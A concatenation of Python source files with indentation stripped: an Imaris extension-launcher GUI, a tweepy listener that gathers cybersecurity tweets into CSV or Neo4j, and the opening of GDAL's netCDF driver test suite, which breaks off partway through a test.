sys.stdout.flush()
server.handle_request()
except KeyboardInterrupt:
print "Finished"
|
ExtensionDriver.py
|
# =========================================================================
#
# Copyright Ziv Yaniv
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0.txt
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# =========================================================================
import sys
import os
import glob
import importlib
from functools import partial
import xml.etree.ElementTree as et
from PySide2.QtWidgets import QApplication, QAction, QLabel, QMainWindow
import qdarkstyle
"""
This script serves as a driver for Imaris extensions allowing us to run them
without requiring the Imaris program. This only works for the extensions that
were designed with this in mind (standalone GUI programs). The locations of the
extensions can be specified on the commandline as a list of paths. The default
location is assumed to be the same as the location of this script.
"""
class ExtensionDriverDialog(QMainWindow):
def __init__(self, extension_paths):
super(ExtensionDriverDialog, self).__init__()
self.__create_gui(self.__load_extensions(extension_paths))
self.setWindowTitle("Imaris Extensions Driver")
self.show()
def __load_extensions(self, extension_paths):
# The imaris convention assumes the extensions are in files with a file
# extension of '.py', this is also important when loading with importlib
# otherwise the importlib code below needs to be modified. The extension
# description is found in a comment in the file with the following xml
# structure (Submenu tag is optional).
# <CustomTools>
# <Menu>
# <Submenu name="Name of Sub Menu">
# <Item name="Name of Extension" icon="Python3" tooltip="Extension tooltip">
# <Command>Python3XT::ExtensionFunctionName(%i)</Command>
# </Item>
# </Submenu>
# </Menu>
# </CustomTools>
potential_extension_files = []
for path in extension_paths:
potential_extension_files.extend(
glob.glob(os.path.join(os.path.abspath(path), "*.py"))
)
extensions = []
for file_name in potential_extension_files:
with open(file_name, "r") as fp:
lines = fp.readlines()
# The extension description is contained as xml in a comment so
# get all comments from the file.
comments = []
current_comment = ""
for ln in lines:
if ln.strip().startswith("#"):
current_comment = current_comment + ln.strip(" \t\n#")
elif current_comment:
comments.append(current_comment)
current_comment = ""
for comment in comments:
# Search for the imaris xml data in each comment.
xml_start = comment.find("<CustomTools>")
xml_end = comment.find("</CustomTools>") + len("</CustomTools>")
if xml_start != -1 and xml_end != -1:
comment = comment[xml_start:xml_end]
try:
elem = et.fromstring(comment)
if elem.tag == "CustomTools": # This is an extension
elem = elem.find("Menu")
submenu_name = None # optional sub menu
if elem.find("Submenu"):
elem = elem.find("Submenu")
submenu_name = elem.get("name")
elem = elem.find("Item")
ext_name = elem.get("name")
ext_tooltip = elem.get("tooltip")
# Clunky parsing of the command string, but I prefer two splits over 'import re'
ext_command = (
elem.find("Command").text.split(":")[-1].split("(")[0]
)
# import the extension and get the pointer to the function, ensures that this is
# an imaris extension.
spec = importlib.util.spec_from_file_location(
os.path.split(file_name)[1][:-3], file_name
)
module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(module)
getattr(module, ext_command)
# extensions.append([submenu_name, ext_name, ext_tooltip, getattr(module,ext_command)])
extensions.append(
[submenu_name, ext_name, ext_tooltip, file_name]
)
break # Ignore any additional extension descriptions in the file
except Exception:
pass
return extensions
def __launch(self, script_to_run):
# running a function in another process doesn't seem to work on OSX,
# crashes, appears to be a known bug: https://bugs.python.org/issue33725
# from multiprocessing import Process
# p = Process(target=f)
# p.daemon = True
# p.start()
import subprocess
subprocess.Popen(
[sys.executable, script_to_run],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
def __create_gui(self, extensions_list):
menu_bar = self.menuBar()
# Force menubar to be displayed in the application on OSX/Linux, otherwise it
# is displayed in the system menubar
menu_bar.setNativeMenuBar(False)
extensions_menu = menu_bar.addMenu("Imaris Extensions")
sub_menus = {}
for extension in extensions_list:
if extension[0]:
try:
sub_menu = sub_menus[extension[0]]
except Exception: # create the sub menu only once
sub_menu = extensions_menu.addMenu(extension[0])
sub_menus[extension[0]] = sub_menu
else:
sub_menu = extensions_menu
extensionAction = QAction(extension[1], self)
extensionAction.setToolTip(extension[2])
extensionAction.triggered.connect(partial(self.__launch, extension[3]))
sub_menu.addAction(extensionAction)
sub_menu.setToolTipsVisible(True)
self.setCentralWidget(
QLabel(
"This program allows you to run imaris extensions that are designed to work as standalone programs.\n"
+ "Select the extension you want to run from the menu-bar."
)
)
if __name__ == "__main__":
app = QApplication(sys.argv)
app.setStyle(
"Windows"
) # Always use windows style as that is our users' main platform
app.setStyleSheet(qdarkstyle.load_stylesheet(qt_api="pyside2"))
# default directory containing extensions is the same as the one containing
# this script (don't use '.' as that refers to the working directory).
extenstions_directories = [os.path.dirname(os.path.abspath(__file__))]
for dir_name in sys.argv[1:]:
if os.path.isdir(dir_name):
extenstions_directories.append(dir_name)
driver = ExtensionDriverDialog(extension_paths=extenstions_directories)
sys.exit(app.exec_())
|
listeners.py
|
"""
Custom listeners for monitoring cybersecurity tweets.
"""
import configparser
import csv
import os
import sys
import time
from http.client import IncompleteRead as http_incompleteRead
from queue import Queue
from threading import Thread
from urllib3.exceptions import IncompleteRead as urllib3_incompleteRead
import tweepy
from megatick.database import tweet_to_neo4j, link_tweets, get_tweet_node
from megatick.scraper import Scraper
from megatick.utils import get_full_text, get_urls, tweet_is_notable
class MegatickStreamListener(tweepy.StreamListener):
"""A tweepy StreamListener with custom error handling."""
def __init__(self, api=None, graph=None, prefix=None):
"""Initialize MegatickStreamListener"""
super().__init__(api=api)
print("Initializing listener")
# load configuration
self.conf = configparser.ConfigParser()
self.conf.read("config.ini")
# Neo4j database graph or None
self.graph = graph
# status_queue (single-threaded) for handling tweets as they come in
# without binding up
self.status_queue = Queue(maxsize=0)
status_thread = Thread(target=self.record_status)
status_thread.start()
# read list of blacklisted user IDs to filter out.
# NB: long numbers (stored as strings) rather than handles which change
self.user_blacklist = None
if self.conf.has_option("twitter", "userBlacklistLoc"):
user_blacklist_loc = self.conf.get("twitter", "userBlacklistLoc")
with open(user_blacklist_loc, "r") as bl_file:
self.user_blacklist = [line.strip() for line in bl_file]
# read list of blacklisted terms and join them using | (or) for regex
# searches
self.kw_blacklist = None
if self.conf.has_option("twitter", "keywordBlacklistLoc"):
kw_blacklist_loc = self.conf.get("twitter", "keywordBlacklistLoc")
with open(kw_blacklist_loc, "r") as bl_file:
pieces = [line.strip() for line in bl_file]
self.kw_blacklist = "|".join(pieces)
# if no graph, then print header to csv
if self.graph is None:
output_location = self.conf.get("twitter", "tweetsLoc")
print("printing csv to " + output_location)
# establish a filename with the current datetime
filename = time.strftime("%Y-%m-%dT%H-%M-%S") + ".csv"
if prefix is not None:
filename = prefix + "_" + filename
# Create a new file with that filename
self.csv_file = open(os.path.join(output_location, filename), "w")
# create a csv writer
self.csv_writer = csv.writer(self.csv_file)
# write a single row with the headers of the columns
self.csv_writer.writerow(["text",
"created_at",
"geo",
"lang",
"place",
"coordinates",
"user.favourites_count",
"user.statuses_count",
"user.description",
"user.location",
"user.id",
"user.created_at",
"user.verified",
"user.following",
"user.url",
"user.listed_count",
"user.followers_count",
"user.default_profile_image",
"user.utc_offset",
"user.friends_count",
"user.default_profile",
"user.name",
"user.lang",
"user.screen_name",
"user.geo_enabled",
"user.time_zone",
"id",
"favorite_count",
"retweeted",
"source",
"favorited",
"retweet_count"])
# flush to force writing
self.csv_file.flush()
# when using Neo4j graph, also retrieve sites and twitter threads
else:
self.thread_queue = Queue(maxsize=0)
thread_thread = Thread(target=self.get_thread)
thread_thread.start()
self.scraper = Scraper(self.conf, self.graph)
# see https://github.com/tweepy/tweepy/issues/908#issuecomment-373840687
def on_data(self, raw_data):
"""
This function overloads the on_data function in the tweepy package.
It is called when raw data is received from tweepy connection.
"""
# print("received data")
try:
super().on_data(raw_data)
return True
except http_incompleteRead as error:
print("http.client Incomplete Read error: %s" % str(error))
print("Restarting stream search in 5 seconds...")
time.sleep(5)
return True
except urllib3_incompleteRead as error:
print("urllib3 Incomplete Read error: %s" % str(error))
print("Restarting stream search in 5 seconds...")
time.sleep(5)
return True
except BaseException as error:
print("Error on_data: %s, Pausing..." % str(error))
time.sleep(5)
return True
def on_status(self, status):
"""
When a status is posted, sends it to a queue for recording.
Using a queue prevents back-ups from high volume.
Args:
status: a tweet with metadata
"""
print("found tweet")
try:
self.status_queue.put(status)
except BaseException as error:
print("Error on_status: %s, Pausing..." % str(error))
time.sleep(5)
# print(str(len(self.status_queue.queue)) + " items in status_queue")
def on_error(self, status_code):
"""Print error codes as they occur"""
print("Encountered error with status code:", status_code)
# End the stream if the error code is 401 (bad credentials)
if status_code == 401:
return False
return True
def on_delete(self, status_id, user_id):
"""Note deleted tweets but do nothing else."""
print("Delete notice")
return True
def on_limit(self, track):
"""Sleep and retry upon rate limit."""
# Print rate limiting error
print("Rate limited, waiting 15 minutes")
# Wait 15 minutes
time.sleep(15 * 60)
# Continue mining tweets
return True
def on_timeout(self):
"""Sleep and retry when timed out."""
# Print timeout message
print(sys.stderr, "Timeout...")
# Wait 10 seconds
time.sleep(10)
# Continue mining tweets
return True
def get_thread(self, show_rate_limit=None):
"""
Given a Tweet object and its parent (either the tweet it's a
quote-tweet of, or the tweet it's a reply to), find the parent (and
its parents, recursively) and link the tweet to its parent.
"""
# Time between requests to avoid overrunning rate limit
if show_rate_limit is None:
show_rate_limit = self.conf.getfloat("twitter", "showRateLimit")
while True:
# get next tweet and parent ID from queue
later_status, earlier_id = self.thread_queue.get()
try:
# sleep first to respect rate limit
time.sleep(show_rate_limit)
# ask for status using GET statuses/show/:id
# TODO: batch these to get up to 100 using statuses/lookup
earlier_status = self.api.get_status(earlier_id)
except BaseException as error:
print("Error get_thread: %s, Pausing..." % str(error))
time.sleep(5)
# no available status at that ID (deleted or nonexistent)
self.thread_queue.task_done()
continue
# sanity check for content
if hasattr(earlier_status, "user"):
# record status
tweet_to_neo4j(self.graph, earlier_status)
# add link to graph to recreate Twitter threading
link_tweets(self.graph, later_status, earlier_status)
# recursive call to follow outgoing links
self.follow_links(earlier_status)
self.thread_queue.task_done()
def record_status(self):
"""
Pulls a status from the queue and records it.
"""
while True:
status = self.status_queue.get()
notable = tweet_is_notable(status,
user_blacklist=self.user_blacklist,
kw_blacklist=self.kw_blacklist)
# check for notability, currently hardcoded as English and not RT
# TODO: make this modular to allow ML/ruley models of notability
if not notable:
# print("not notable, language=" + status.lang + " " + status.text)
continue
# print("writing " + str(status.id))
# If no Neo4j graph, write to csv
if self.graph is None:
try:
# print("trying to write " + str(status.id) + " to csv")
self.write_status_to_csv(status)
except Exception as error:
print(error)
# Neo4j graph is available, so write to it
else:
# add tweet to Neo4j graph
tweet_to_neo4j(self.graph, status)
# recursive call to follow outgoing links
self.follow_links(status)
# in case we need side effects for finishing a task, mark complete
self.status_queue.task_done()
def write_status_to_csv(self, status):
"""Write a status in flat format (not following links)"""
full_text = get_full_text(status)
# Write the tweet's information to the csv file
self.csv_writer.writerow([full_text,
status.created_at,
status.geo,
status.lang,
status.place,
status.coordinates,
status.user.favourites_count,
status.user.statuses_count,
status.user.description,
status.user.location,
status.user.id,
status.user.created_at,
status.user.verified,
status.user.following,
status.user.url,
status.user.listed_count,
status.user.followers_count,
status.user.default_profile_image,
status.user.utc_offset,
status.user.friends_count,
status.user.default_profile,
status.user.name,
status.user.lang,
status.user.screen_name,
status.user.geo_enabled,
status.user.time_zone,
status.id_str,
status.favorite_count,
status.retweeted,
status.source,
status.favorited,
status.retweet_count])
# flush to force writing
self.csv_file.flush()
def follow_links(self, status, urls=None):
"""
Follow (quote, reply, external) links and add them to queues. This
is accomplished through threads to avoid blocking up stream.filter
"""
if urls is None:
urls = get_urls(status)
if len(urls) > 0:
# add url to scrape queue
self.scraper.link(get_tweet_node(self.graph, status), urls)
if status.is_quote_status:
# add upstream quote-tweet thread to download pipe
prev_id = status.quoted_status_id
self.thread_queue.put((status, prev_id))
if status.in_reply_to_status_id is not None:
# add upstream tweet reply thread to download pipe
prev_id = status.in_reply_to_status_id
self.thread_queue.put((status, prev_id))
|
netcdf.py
|
#!/usr/bin/env pytest
# -*- coding: utf-8 -*-
###############################################################################
# $Id$
#
# Project: GDAL/OGR Test Suite
# Purpose: Test NetCDF driver support.
# Author: Frank Warmerdam <warmerdam@pobox.com>
#
###############################################################################
# Copyright (c) 2007, Frank Warmerdam <warmerdam@pobox.com>
# Copyright (c) 2008-2016, Even Rouault <even.rouault at spatialys.com>
# Copyright (c) 2010, Kyle Shannon <kyle at pobox dot com>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
###############################################################################
import os
import sys
import shutil
import struct
from osgeo import gdal
from osgeo import ogr
from osgeo import osr
import pytest
import gdaltest
import test_cli_utilities
from uffd import uffd_compare
###############################################################################
# Netcdf Functions
###############################################################################
###############################################################################
# Get netcdf version and test for supported files
@pytest.fixture(autouse=True, scope='module')
def netcdf_setup():
# NOTE: this is also used by netcdf_cf.py
gdaltest.netcdf_drv_version = 'unknown'
gdaltest.netcdf_drv_has_nc2 = False
gdaltest.netcdf_drv_has_nc4 = False
gdaltest.netcdf_drv_has_hdf4 = False
gdaltest.netcdf_drv_silent = False
gdaltest.netcdf_drv = gdal.GetDriverByName('NETCDF')
if gdaltest.netcdf_drv is None:
pytest.skip('NOTICE: netcdf not supported, skipping checks')
# get capabilities from driver
metadata = gdaltest.netcdf_drv.GetMetadata()
if metadata is None:
pytest.skip('NOTICE: netcdf metadata not found, skipping checks')
# netcdf library version "3.6.3" of Dec 22 2009 06:10:17 $
# netcdf library version 4.1.1 of Mar 4 2011 12:52:19 $
if 'NETCDF_VERSION' in metadata:
v = metadata['NETCDF_VERSION']
v = v[0: v.find(' ')].strip('"')
gdaltest.netcdf_drv_version = v
if 'NETCDF_HAS_NC2' in metadata \
and metadata['NETCDF_HAS_NC2'] == 'YES':
gdaltest.netcdf_drv_has_nc2 = True
if 'NETCDF_HAS_NC4' in metadata \
and metadata['NETCDF_HAS_NC4'] == 'YES':
gdaltest.netcdf_drv_has_nc4 = True
if 'NETCDF_HAS_HDF4' in metadata \
and metadata['NETCDF_HAS_HDF4'] == 'YES':
gdaltest.netcdf_drv_has_hdf4 = True
print('NOTICE: using netcdf version ' + gdaltest.netcdf_drv_version +
' has_nc2: ' + str(gdaltest.netcdf_drv_has_nc2) + ' has_nc4: ' +
str(gdaltest.netcdf_drv_has_nc4))
gdaltest.count_opened_files = len(gdaltest.get_opened_files())
@pytest.fixture(autouse=True, scope='module')
def netcdf_teardown():
diff = len(gdaltest.get_opened_files()) - gdaltest.count_opened_files
assert diff == 0, 'Leak of file handles: %d leaked' % diff
###############################################################################
# test file copy
# helper function needed so we can call Process() on it from netcdf_test_copy_timeout()
def netcdf_test_copy(ifile, band, checksum, ofile, opts=None, driver='NETCDF'):
# pylint: disable=unused-argument
opts = [] if opts is None else opts
test = gdaltest.GDALTest('NETCDF', '../' + ifile, band, checksum, options=opts)
return test.testCreateCopy(check_gt=0, check_srs=0, new_filename=ofile, delete_copy=0, check_minmax=0)
###############################################################################
# test file copy, optional timeout arg
def netcdf_test_copy_timeout(ifile, band, checksum, ofile, opts=None, driver='NETCDF', timeout=None):
from multiprocessing import Process
drv = gdal.GetDriverByName(driver)
if os.path.exists(ofile):
drv.Delete(ofile)
if timeout is None:
netcdf_test_copy(ifile, band, checksum, ofile, opts, driver)
else:
sys.stdout.write('.')
sys.stdout.flush()
proc = Process(target=netcdf_test_copy, args=(ifile, band, checksum, ofile, opts))
proc.start()
proc.join(timeout)
# if proc is alive after timeout we must terminate it, and return fail
# valgrind detects memory leaks when this occurs (although it should never happen)
if proc.is_alive():
proc.terminate()
if os.path.exists(ofile):
drv.Delete(ofile)
print('testCreateCopy() for file %s has reached timeout limit of %d seconds' % (ofile, timeout))
pytest.fail()
###############################################################################
# check support for DEFLATE compression, requires HDF5 and zlib
def netcdf_test_deflate(ifile, checksum, zlevel=1, timeout=None):
try:
from multiprocessing import Process
Process.is_alive
except (ImportError, AttributeError):
pytest.skip('from multiprocessing import Process failed')
if gdaltest.netcdf_drv is None:
pytest.skip()
if not gdaltest.netcdf_drv_has_nc4:
pytest.skip()
ofile1 = 'tmp/' + os.path.basename(ifile) + '-1.nc'
ofile1_opts = ['FORMAT=NC4C', 'COMPRESS=NONE']
ofile2 = 'tmp/' + os.path.basename(ifile) + '-2.nc'
ofile2_opts = ['FORMAT=NC4C', 'COMPRESS=DEFLATE', 'ZLEVEL=' + str(zlevel)]
assert os.path.exists(ifile), ('ifile %s does not exist' % ifile)
netcdf_test_copy_timeout(ifile, 1, checksum, ofile1, ofile1_opts, 'NETCDF', timeout)
netcdf_test_copy_timeout(ifile, 1, checksum, ofile2, ofile2_opts, 'NETCDF', timeout)
# make sure compressed file is smaller than uncompressed files
try:
size1 = os.path.getsize(ofile1)
size2 = os.path.getsize(ofile2)
except OSError:
pytest.fail('Error getting file sizes.')
assert size2 < size1, \
'Compressed file is not smaller than reference, check your netcdf-4, HDF5 and zlib installation'
###############################################################################
# check support for reading attributes (single values and array values)
def netcdf_check_vars(ifile, vals_global=None, vals_band=None):
src_ds = gdal.Open(ifile)
assert src_ds is not None, ('could not open dataset ' + ifile)
metadata_global = src_ds.GetMetadata()
assert metadata_global is not None, ('could not get global metadata from ' + ifile)
missval = src_ds.GetRasterBand(1).GetNoDataValue()
assert missval == 1, ('got invalid nodata value %s for Band' % str(missval))
metadata_band = src_ds.GetRasterBand(1).GetMetadata()
assert metadata_band is not None, 'could not get Band metadata'
metadata = metadata_global
vals = vals_global
if vals is None:
vals = dict()
for k, v in vals.items():
assert k in metadata, ("missing metadata [%s]" % (str(k)))
# strip { and } as new driver uses these for array values
mk = metadata[k].lstrip('{ ').rstrip('} ')
assert mk == v, ("invalid value [%s] for metadata [%s]=[%s]"
% (str(mk), str(k), str(v)))
metadata = metadata_band
vals = vals_band
if vals is None:
vals = dict()
for k, v in vals.items():
assert k in metadata, ("missing metadata [%s]" % (str(k)))
# strip { and } as new driver uses these for array values
mk = metadata[k].lstrip('{ ').rstrip('} ')
assert mk == v, ("invalid value [%s] for metadata [%s]=[%s]"
% (str(mk), str(k), str(v)))
###############################################################################
# Netcdf Tests
###############################################################################
###############################################################################
# Perform simple read test.
def test_netcdf_1():
if gdaltest.netcdf_drv is None:
pytest.skip()
tst = gdaltest.GDALTest('NetCDF', 'NETCDF:"data/bug636.nc":tas', 1, 31621,
filename_absolute=1)
# We don't want to gum up the test stream output with the
# 'Warning 1: No UNIDATA NC_GLOBAL:Conventions attribute' message.
gdal.PushErrorHandler('CPLQuietErrorHandler')
tst.testOpen()
gdal.PopErrorHandler()
###############################################################################
# Verify a simple createcopy operation. We can't do the trivial gdaltest
# operation because the new file will only be accessible via subdatasets.
def test_netcdf_2():
if gdaltest.netcdf_drv is None:
pytest.skip()
src_ds = gdal.Open('data/byte.tif')
gdaltest.netcdf_drv.CreateCopy('tmp/netcdf2.nc', src_ds)
tst = gdaltest.GDALTest('NetCDF', 'tmp/netcdf2.nc',
1, 4672,
filename_absolute=1)
wkt = """PROJCS["NAD27 / UTM zone 11N",
GEOGCS["NAD27",
DATUM["North_American_Datum_1927",
SPHEROID["Clarke 1866",6378206.4,294.9786982139006,
AUTHORITY["EPSG","7008"]],
AUTHORITY["EPSG","6267"]],
PRIMEM["Greenwich",0],
UNIT["degree",0.0174532925199433],
AUTHORITY["EPSG","4267"]],
PROJECTION["Transverse_Mercator"],
PARAMETER["latitude_of_origin",0],
PARAMETER["central_meridian",-117],
PARAMETER["scale_factor",0.9996],
PARAMETER["false_easting",500000],
PARAMETER["false_northing",0],
UNIT["metre",1,
AUTHORITY["EPSG","9001"]],
AUTHORITY["EPSG","26711"]]"""
tst.testOpen(check_prj=wkt)
# Check that no nodata value is reported for a Byte dataset
ds = gdal.Open('tmp/netcdf2.nc')
assert ds.GetRasterBand(1).GetNoDataValue() is None
ds = None
# Test that in raster-only mode, update isn't supported (not sure what would be missing for that...)
with gdaltest.error_handler():
ds = gdal.Open('tmp/netcdf2.nc', gdal.GA_Update)
assert ds is None
gdaltest.clean_tmp()
###############################################################################
def test_netcdf_3():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.Open('data/sombrero.grd')
bnd = ds.GetRasterBand(1)
minmax = bnd.ComputeRasterMinMax()
assert minmax[0] == pytest.approx((-0.675758), abs=0.000001) and minmax[1] == pytest.approx(1.0, abs=0.000001), \
'Wrong min or max.'
bnd = None
ds = None
###############################################################################
# In #2582 5dimensional files were causing problems. Verify use ok.
def test_netcdf_4():
if gdaltest.netcdf_drv is None:
pytest.skip()
tst = gdaltest.GDALTest('NetCDF',
'NETCDF:data/foo_5dimensional.nc:temperature',
3, 1218, filename_absolute=1)
# We don't want to gum up the test stream output with the
# 'Warning 1: No UNIDATA NC_GLOBAL:Conventions attribute' message.
gdal.PushErrorHandler('CPLQuietErrorHandler')
# don't test for checksum (see bug #4284)
result = tst.testOpen(skip_checksum=True)
gdal.PopErrorHandler()
return result
###############################################################################
# In #2583 5dimensional files were having problems unrolling the highest
# dimension - check handling now on band 7.
def test_netcdf_5():
if gdaltest.netcdf_drv is None:
pytest.skip()
tst = gdaltest.GDALTest('NetCDF',
'NETCDF:data/foo_5dimensional.nc:temperature',
7, 1227, filename_absolute=1)
# We don't want to gum up the test stream output with the
# 'Warning 1: No UNIDATA NC_GLOBAL:Conventions attribute' message.
gdal.PushErrorHandler('CPLQuietErrorHandler')
# don't test for checksum (see bug #4284)
result = tst.testOpen(skip_checksum=True)
gdal.PopErrorHandler()
return result
###############################################################################
# ticket #3324 check spatial reference reading for cf-1.4 lambert conformal
# 1 standard parallel.
def test_netcdf_6():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.Open('data/cf_lcc1sp.nc')
prj = ds.GetProjection()
sr = osr.SpatialReference()
sr.ImportFromWkt(prj)
lat_origin = sr.GetProjParm('latitude_of_origin')
assert lat_origin == 25, ('Latitude of origin does not match expected:\n%f'
% lat_origin)
ds = None
###############################################################################
# ticket #3324 check spatial reference reading for cf-1.4 lambert conformal
# 2 standard parallels.
def test_netcdf_7():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.Open('data/cf_lcc2sp.nc')
prj = ds.GetProjection()
sr = osr.SpatialReference()
sr.ImportFromWkt(prj)
std_p1 = sr.GetProjParm('standard_parallel_1')
std_p2 = sr.GetProjParm('standard_parallel_2')
assert std_p1 == 33.0 and std_p2 == 45.0, \
('Standard Parallels do not match expected:\n%f,%f'
% (std_p1, std_p2))
ds = None
sr = None
###############################################################################
# check for cf convention read of albers equal area
# Previous version compared entire wkt, which varies slightly among driver versions
# now just look for PROJECTION=Albers_Conic_Equal_Area and some parameters
def test_netcdf_8():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.Open('data/cf_aea2sp_invf.nc')
srs = osr.SpatialReference()
srs.ImportFromWkt(ds.GetProjection())
proj = srs.GetAttrValue('PROJECTION')
assert proj == 'Albers_Conic_Equal_Area', \
('Projection does not match expected : ' + proj)
param = srs.GetProjParm('latitude_of_center')
assert param == 37.5, ('Got wrong parameter value (%g)' % param)
param = srs.GetProjParm('longitude_of_center')
assert param == -96, ('Got wrong parameter value (%g)' % param)
ds = None
###############################################################################
# check to see if projected systems default to wgs84 if no spheroid def
def test_netcdf_9():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.Open('data/cf_no_sphere.nc')
prj = ds.GetProjection()
sr = osr.SpatialReference()
sr.ImportFromWkt(prj)
spheroid = sr.GetAttrValue('SPHEROID')
assert spheroid == 'WGS 84', ('Incorrect spheroid read from file\n%s'
% (spheroid))
ds = None
sr = None
###############################################################################
# check if km pixel size makes it through to gt
def test_netcdf_10():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.Open('data/cf_no_sphere.nc')
prj = ds.GetProjection()
gt = ds.GetGeoTransform()
gt1 = (-1897186.0290038721, 5079.3608398440065,
0.0, 2674684.0244560046,
0.0, -5079.4721679684635)
gt2 = (-1897.186029003872, 5.079360839844003,
0.0, 2674.6840244560044,
0.0, -5.079472167968456)
if gt != gt1:
sr = osr.SpatialReference()
sr.ImportFromWkt(prj)
# new driver uses UNIT vattribute instead of scaling values
assert (sr.GetAttrValue("PROJCS|UNIT", 1) == "1000" and gt == gt2), \
('Incorrect geotransform, got ' + str(gt))
ds = None
###############################################################################
# check if ll gets caught in km pixel size check
def test_netcdf_11():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.Open('data/cf_geog.nc')
gt = ds.GetGeoTransform()
assert gt == (-0.5, 1.0, 0.0, 10.5, 0.0, -1.0), 'Incorrect geotransform'
ds = None
###############################################################################
# check for scale/offset set/get.
def test_netcdf_12():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.Open('data/scale_offset.nc')
scale = ds.GetRasterBand(1).GetScale()
offset = ds.GetRasterBand(1).GetOffset()
assert scale == 0.01 and offset == 1.5, \
('Incorrect scale(%f) or offset(%f)' % (scale, offset))
ds = None
###############################################################################
# check for scale/offset = None if no scale or offset is available
def test_netcdf_13():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.Open('data/no_scale_offset.nc')
scale = ds.GetRasterBand(1).GetScale()
offset = ds.GetRasterBand(1).GetOffset()
assert scale is None and offset is None, 'Incorrect scale or offset'
ds = None
###############################################################################
# check for scale/offset for two variables
def test_netcdf_14():
if gdaltest.netcdf_drv is None:
pytest.skip()
ds = gdal.Open('NETCDF:data/two_vars_scale_offset.nc:z')
scale = ds.GetRasterBand(1).GetScale()
offset = ds.GetRasterBand(1).GetOffset()
assert scale == 0.01 and offset == 1.5, \
('Incorrect scale(%f) or offset(%f)' % (scale, offset))
ds = None
ds = gdal.Open('NETCDF:data/two_vars_scale_offset.nc:q')
scale = ds.GetRasterBand(1).GetScale()
offset = ds.GetRasterBand(1).GetOffset()
scale = ds.GetRasterBand(1).GetScale()
offset = ds.GetRasterBand(1).GetOffset()
assert scale == 0.1 and offset == 2.5, \
('Incorrect scale(%f) or offset(%f)' % (scale, offset))
###############################################################################
# check support for netcdf-2 (64 bit)
# This test fails in 1.8.1, because the driver does not support NC2 (bug #3890)
def test_netcdf_15():
if gdaltest.netcdf_drv is None:
pytest.skip()
if gdaltest.netcdf_drv_has_nc2:
ds = gdal.Open('data/trmm-nc2.nc')
assert ds is not None
ds = None
return
else:
pytest.skip()
###############################################################################
# check support for netcdf-4
def test_netcdf_16():
if gdaltest.netcdf_drv is None:
pytest.skip()
ifile = 'data/trmm-nc4.nc'
if gdaltest.netcdf_drv_has_nc4:
# test with Open()
ds = gdal.Open(ifile)
if ds is None:
pytest.fail('GDAL did not open file')
else:
name = ds.GetDriver().GetDescription()
ds = None
# return fail if did not open with the netCDF driver (i.e. HDF5Image)
assert name == 'netCDF', 'netcdf driver did not open file'
# test with Identify()
name = gdal.IdentifyDriver(ifile).GetDescription()
assert name == 'netCDF', 'netcdf driver did not identify file'
else:
pytest.skip()
###############################################################################
# check support for netcdf-4 - make sure hdf5 is not read by netcdf driver
def test_netcdf_17():
if gdaltest.netcdf_drv is None:
pytest.skip()
ifile = 'data/groups.h5'
# skip test if Hdf5 is not enabled
if gdal.GetDriverByName('HDF5') is None and \
gdal.GetDriverByName('HDF5Image') is None:
pytest.skip()
if gdaltest.netcdf_drv_has_nc4:
# test with Open()
ds = gdal.Open(ifile)
if ds is None:
pytest.fail('GDAL did not open hdf5 file')
else:
name = ds.GetDriver().GetDescription()
ds = None
# return fail if opened with the netCDF driver
assert name != 'netCDF', 'netcdf driver opened hdf5 file'
# test with Identify()
name = gdal.IdentifyDriver(ifile).GetDescription()
assert name != 'netCDF', 'netcdf driver was identified for hdf5 file'
else:
pytest.skip()
###############################################################################
# check support for netcdf-4 classic (NC4C)
def test_netcdf_18():
if gdaltest.netcdf_drv is None:
pytest.skip()
ifile = 'data/trmm-nc4c.nc'
if gdaltest.netcdf_drv_has_nc4:
# test with Open()
ds = gdal.Open(ifile)
if ds is None:
pytest.fail()
else:
name = ds.GetDriver().GetDescription()
ds = None
# return fail if did not open with the netCDF driver (i.e. HDF5Image)
assert name == 'netCDF'
# test with Identify()
name = gdal.IdentifyDriver(ifile).GetDescription()
assert name == 'netCDF'
else:
pytest.skip()
###############################################################################
# check support for reading with DEFLATE compression, requires NC4
def test_netcdf_19():
if gdaltest.netcdf_drv is None:
pytest.skip()
if not gdaltest.netcdf_drv_has_nc4:
pytest.skip()
tst = gdaltest.GDALTest('NetCDF', 'data/trmm-nc4z.nc', 1, 50235,
filename_absolute=1)
result = tst.testOpen(skip_checksum=True)
return result
###############################################################################
# check support for writing with DEFLATE compression, requires NC4
def test_netcdf_20():
if gdaltest.netcdf_drv is None:
pytest.skip()
if not gdaltest.netcdf_drv_has_nc4:
pytest.skip()
# simple test with tiny file
